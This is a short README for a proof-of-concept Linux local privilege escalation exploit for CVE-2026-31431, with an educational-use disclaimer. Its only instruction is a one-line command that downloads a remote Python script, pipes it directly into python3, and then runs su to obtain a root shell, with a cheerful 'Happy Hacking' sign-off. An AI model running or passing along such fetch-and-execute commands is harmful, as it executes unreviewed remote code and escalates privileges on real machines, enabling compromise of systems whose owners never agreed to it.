
Proof-of-concept exploit for CVE-2026-31431, a Linux local privilege escalation vulnerability, demonstrating kernel exploitation for educational and authorized security testing.
This repository contains a Proof of Concept (PoC) exploit for CVE-2026-31431, demonstrating a local privilege escalation vulnerability.
[!WARNING] This project is intended strictly for educational and security research purposes only.
Use it only on systems you own or systems where you have explicit written authorization to test.
Unauthorized use may be illegal and is strongly discouraged.
Just Run :
curl -s https://raw.githubusercontent.com/AliHzSec/CVE-2026-31431/refs/heads/master/main.py | python3 && su
Happy Hacking :)